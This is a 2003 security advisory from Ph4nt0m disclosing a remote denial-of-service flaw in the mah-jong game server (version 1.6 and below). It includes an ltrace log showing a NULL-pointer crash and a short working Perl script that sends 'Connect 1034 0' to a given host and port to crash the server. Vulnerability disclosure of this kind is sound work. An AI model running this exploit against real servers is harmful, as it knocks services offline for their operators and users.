Ph4nt0m Security Advisory #2003-9-9 - mah-jong versions 1.6 and below are susceptible to a remote denial of service attack.
9f7ebf87e359ccad366264bb0a277e015fb72bb0f3f9f57fae88ca20d2a63c19
========================================
Ph4nt0m Security Advisory #2003--9-9
========================================
mah-jong server --remote dos vuln
By jsk, in ph4nt0m.net(c) Security.
E-mail: jsk[at]ph4nt0m.net
Advisory Number : pst-2003--10-12-007
Program Name : mah-jong
Version : all versions(the new vesion 1.6 is vuln)(can't path it in DSA-378-1)
Type : remote dos
OS Affected : debian or other os
*****************************************************************************
Description : it is a null argv[] vuln
*****************************************************************************
Details:
*****************************************************************************
.............
read(4, "C", 1) = 1
read(4, "o", 1) = 1
read(4, "n", 1) = 1
read(4, "n", 1) = 1
read(4, "e", 1) = 1
read(4, "c", 1) = 1
read(4, "t", 1) = 1
read(4, " ", 1) = 1
read(4, "1", 1) = 1
read(4, "0", 1) = 1
read(4, "3", 1) = 1
read(4, "4", 1) = 1
read(4, " ", 1) = 1
read(4, "0", 1) = 1
read(4, "\r", 1) = 1
read(4, "\n", 1) = 1
strlen("Connect 1034 0\r\n") = 16
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
strcmp("Connect", "SaveState") = -16
strcmp("Connect", "LoadState") = -9
strcmp("Connect", "Connect") = 0
malloc(16) = 0x08080db0
sscanf(0x080845f8, 0x08076fa0, 0xbffff77c, 0xbffff784, 1) = 1
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
sscanf(0x080845fd, 0x08076fa0, 0xbffff77c, 0xbffff784, 1) = 1
__ctype_b_loc(1, 0, 0x400148cc, 0x40014ec8, 1) = 0x40157418
strncmp(NULL, "Robot", 5 <unfinished ...>
--- SIGSEGV (Segmentation fault) ---
**********************************************************************************************
exploit:
#!/usr/bin/perl -s
use IO::Socket;
# test it in slackware 9.0
# DOS-test--mj1.6--code by jsk
# mahJong 1.6, all versions of mahjong
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./dosmj.pl <host> <port>\n"; exit(-1); }
$host = $ARGV[0];
$port = $ARGV[1];
$jsk ="Connect 1034 0";
$socket = new IO::Socket::INET (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "Connect 1034 0";
print $socket "\r\n";
close($socket);
**********************************************************************************************
path : http://www.stevens-bradfield.com/MahJong/
Julian Bradfield or securityteam of debian will path it.